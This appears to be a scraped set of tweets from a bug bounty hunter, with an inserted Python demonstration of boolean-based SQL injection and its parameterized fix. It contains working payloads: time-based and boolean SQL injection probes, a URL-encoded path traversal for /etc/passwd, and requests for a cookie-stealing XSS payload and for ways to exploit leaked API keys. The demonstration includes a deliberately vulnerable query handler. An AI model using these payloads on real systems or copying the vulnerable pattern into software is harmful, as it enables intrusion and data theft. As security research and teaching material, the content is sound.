Mohamed Ibrahim
@mOhamedd7w
Security_Researcher/Bug_Bounty_Hunter
ID:1366684643785867273
02-03-2021 09:40:12
SQLi..
1. original parameter --> content-length:9230
2. inject: and 1=1 # --> content-length:9230
3. inject: and 1=2 # --> content-length:4766
4. Now, sqlmap's turn --> Dump the whole databases
#bugbounty tip #bugbounty #Pentesting
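Why the content-length differs in steps 2 and 3 of the tweet above, and why it stops differing once the value is bound: an added example, not part of the original tweets. It assumes an in-memory SQLite table (so the comment marker is `--` rather than MySQL's `#`); the table, function names and sample rows are hypothetical and constructed for the demonstration.

```python
import sqlite3

def make_db():
    # Constructed sample data: 20 rows in category 1.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE items (id INTEGER PRIMARY KEY, category_id INTEGER, title TEXT)")
    db.executemany("INSERT INTO items (category_id, title) VALUES (?, ?)",
                   [(1, f"item-{n}") for n in range(20)])
    return db

def render(rows):
    # Stand-in for the HTML page; its byte length plays the role of Content-Length.
    return "".join(f"<li>{title}</li>" for (title,) in rows).encode()

def page_vulnerable(db, category):
    # Deliberately vulnerable: the request value is concatenated into the SQL text,
    # so a true/false condition appended to it changes how many rows come back.
    sql = f"SELECT title FROM items WHERE category_id = {category} ORDER BY id"
    return render(db.execute(sql).fetchall())

def page_parameterized(db, category):
    # Hardened: reject anything that is not a plain integer, then bind the value
    # as a parameter so it is never parsed as SQL.
    if not (category.isascii() and category.isdigit()):
        return b"<p>bad request</p>"
    sql = "SELECT title FROM items WHERE category_id = ? ORDER BY id"
    return render(db.execute(sql, (int(category),)).fetchall())

def response_lengths(page, db):
    # Original value, then the always-true and always-false variants from the tweet.
    probes = ["1", "1 and 1=1 -- ", "1 and 1=2 -- "]
    return [len(page(db, p)) for p in probes]

if __name__ == "__main__":
    db = make_db()
    print("vulnerable   :", response_lengths(page_vulnerable, db))
    print("parameterized:", response_lengths(page_parameterized, db))
```

In the vulnerable handler the first two lengths match and the third drops, which is the signal the tweet relies on; in the parameterized handler both modified values produce the same fixed rejection page, so the response carries no true/false information.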
IDOR in Bug bounty program but unfortunately duplicate
#bugbounty #penetrationtesting #report #Bugcrowed #hackerone
#hacking #security #ethicalhacking #informationsecurity #cyber #bughunting #infosec #cyber attack #cyber security
Hi Amazing Hackers ..
I need xss payload to steal victim cookies..
The payload should not have backslash '/' .
#bugbountytip #BugBounty #Security #hackerone #bugcrowd
LFI On Fire .❤️
Found an interesting param using the gf tool --> sent the request to Intruder --> used the LFI-Jhaddix wordlist --> Got LFI
Payload used: %2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fetc%2fpasswd
#bugbounty tips #bugbounty #bugcrowd #hackerone #security
Hi amazing hackers:
I have found (Client ID) and (API key) and (INCIDENT FOLDER ID) and (INCIDENT TEMPLATE ID) from the Google Developer Console...
Need a way for Exploitation ...
#bugbountytips #BugBounty #infosecurity #security #Pentesting #PenTest
SQLI confirmed with this payload:
'XOR(if(now()=sysdate(),sleep(5*5),0))OR'
Now, let sqlmap do it ...👇
#bugbounty #bugbounty tips #hackerone #bugcrowd
Check out My new Writeup (How I was Able To Bypass The Admin Panel)
medium.com/@mohameddiv77/…
#bugbountytips #BugBounty